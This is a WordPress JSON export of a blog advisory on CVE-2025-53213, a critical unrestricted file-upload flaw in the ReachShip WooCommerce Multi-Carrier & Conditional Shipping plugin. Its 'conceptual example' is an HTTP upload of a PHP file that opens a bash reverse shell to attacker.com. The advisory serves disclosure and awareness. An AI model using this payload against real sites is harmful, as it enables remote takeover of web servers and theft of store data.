{"id":64334,"date":"2025-08-26T17:31:57","date_gmt":"2025-08-26T17:31:57","guid":{"rendered":""},"modified":"2025-09-04T22:36:46","modified_gmt":"2025-09-05T04:36:46","slug":"cve-2025-53213-unrestricted-upload-of-file-with-dangerous-type-vulnerability-in-woocommerce-multi-carrier-conditional-shipping-plugin","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-53213-unrestricted-upload-of-file-with-dangerous-type-vulnerability-in-woocommerce-multi-carrier-conditional-shipping-plugin\/","title":{"rendered":"<strong>CVE-2025-53213: Unrestricted Upload of File with Dangerous Type Vulnerability in WooCommerce Multi-Carrier &#038; Conditional Shipping Plugin<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>The Common Vulnerabilities and Exposures (CVE) system has recently identified a high-risk vulnerability, designated as CVE-2025-53213, affecting the ReachShip WooCommerce Multi-Carrier &#038; Conditional Shipping plugin. This vulnerability is of particular concern because it allows malicious actors to upload files of dangerous types unrestrictedly, potentially leading to system compromise or data leakage.<br \/>\nAs ReachShip WooCommerce Multi-Carrier &#038; Conditional Shipping is widely used by a vast number of WooCommerce-based online stores, the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-30327-integer-overflow-vulnerability-in-incopy-leading-to-potential-arbitrary-code-execution\/\"  data-wpil-monitor-id=\"73720\">potential impact of this vulnerability<\/a> is far-reaching. It is therefore vital for store owners, developers, IT administrators, and cybersecurity professionals to be aware of this <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-40741-stack-based-overflow-vulnerability-in-solid-edge-se2025-leading-to-potential-system-compromise\/\"  data-wpil-monitor-id=\"75760\">vulnerability and take appropriate action to mitigate its potential<\/a> damages.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-53213<br \/>\nSeverity: Critical (CVSS: 9.9)<br \/>\nAttack Vector: Network<br \/>\nPrivileges Required: None<br \/>\nUser Interaction: None<br \/>\nImpact: Potential system compromise or <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-53495-unauthorized-access-data-leakage-in-wikimedia-foundation-mediawiki-abusefilter-extension\/\"  data-wpil-monitor-id=\"72626\">data leakage<\/a><\/p>\n<p><strong>Affected Products<\/strong><\/p><div id=\"ameeb-3676583292\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 700px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 20px; font-weight: 600; display: flex; align-items: center;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 8px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 40px; height: 40px;\" \/>\r\n    <\/a>\r\n    A new way to communicate\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 12px;\">\r\n    Ameeba Chat is built on encrypted identity, not personal profiles.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 16px;\">\r\n    Message, call, share files, and coordinate with identities kept separate.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 20px;\">\r\n    <li>\u2022 Encrypted identity<\/li>\r\n    <li>\u2022 Ameeba Chat authenticates access<\/li>\r\n    <li>\u2022 Aliases and categories<\/li>\r\n    <li>\u2022 End-to-end encrypted chat, calls, and files<\/li>\r\n    <li>\u2022 Secure notes for sensitive information<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px;\">\r\n    Private communication, rethought.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Download Ameeba Chat<\/a>\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Learn More<\/a>\r\n  <\/div>\r\n<\/div>\r\n<\/div>\n<p>Product | Affected Versions<\/p>\n<p>ReachShip WooCommerce Multi-Carrier &#038; Conditional Shipping | up to and including 4.3.1<\/p>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>This vulnerability arises from insufficient input validation in the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-6754-privilege-escalation-vulnerability-in-seo-metrics-plugin-for-wordpress\/\"  data-wpil-monitor-id=\"72723\">file upload<\/a> mechanism of the affected plugin. This allows a malicious actor to <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-52239-arbitrary-file-upload-vulnerability-in-zkeacms-v4-1\/\"  data-wpil-monitor-id=\"74541\">upload a file<\/a> with a dangerous type, such as executable scripts or malware-infected files, without any restriction. Once uploaded, this file could be executed within the server environment, potentially leading to <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-53499-critical-unauthorized-access-vulnerability-in-wikimedia-foundation-mediawiki-abusefilter-extension\/\"  data-wpil-monitor-id=\"72801\">unauthorized access<\/a>, system compromise, data leakage, or even a full-scale denial of service (DoS) attack.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p><div id=\"ameeb-908203479\" class=\"ameeb-content ameeb-entity-placement\"><div class=\"poptin-embedded\" data-id=\"f6b387694f681\"><\/div>\r\n\r\n\r\n\r\n\r\n\r\n<\/div>\n<p>The following is a conceptual example of a HTTP <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-24000-authentication-bypass-vulnerability-in-wpexperts-post-smtp-plugin\/\"  data-wpil-monitor-id=\"78962\">POST request that could be used to exploit this vulnerability<\/a>:<\/p>\n<pre><code class=\"\" data-line=\"\">POST \/wp-content\/plugins\/reachship-woocommerce\/upload.php HTTP\/1.1\nHost: vulnerablestore.com\nContent-Type: multipart\/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=&quot;uploadfile&quot;; filename=&quot;exploit.php&quot;\nContent-Type: application\/x-php\n&lt;?php\nexec(&quot;\/bin\/bash -c &#039;bash -i &gt;&amp; \/dev\/tcp\/attacker.com\/8080 0&gt;&amp;1&#039;&quot;);\n?&gt;\n------WebKitFormBoundary7MA4YWxkTrZu0gW--<\/code><\/pre>\n<p>In this example, a malicious <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-54689-high-risk-php-remote-file-inclusion-vulnerability-in-urna\/\"  data-wpil-monitor-id=\"76594\">PHP file<\/a> (`exploit.php`) is uploaded to the server. When executed, this file establishes a reverse shell connection to the attacker&#8217;s command and control server (`attacker.com`), potentially giving them full <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-41659-codesys-control-runtime-system-pki-folder-vulnerability\/\"  data-wpil-monitor-id=\"73926\">control over the compromised system<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview The Common Vulnerabilities and Exposures (CVE) system has recently identified a high-risk vulnerability, designated as CVE-2025-53213, affecting the ReachShip WooCommerce Multi-Carrier &#038; Conditional Shipping plugin. This vulnerability is of particular concern because it allows malicious actors to upload files of dangerous types unrestrictedly, potentially leading to system compromise or data leakage. As ReachShip WooCommerce [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[],"product":[],"attack_vector":[87],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-64334","post","type-post","status-publish","format-standard","hentry","category-uncategorized","attack_vector-dos"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/64334","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=64334"}],"version-history":[{"count":9,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/64334\/revisions"}],"predecessor-version":[{"id":71363,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/64334\/revisions\/71363"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=64334"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=64334"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=64334"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=64334"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=64334"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=64334"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=64334"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=64334"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=64334"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}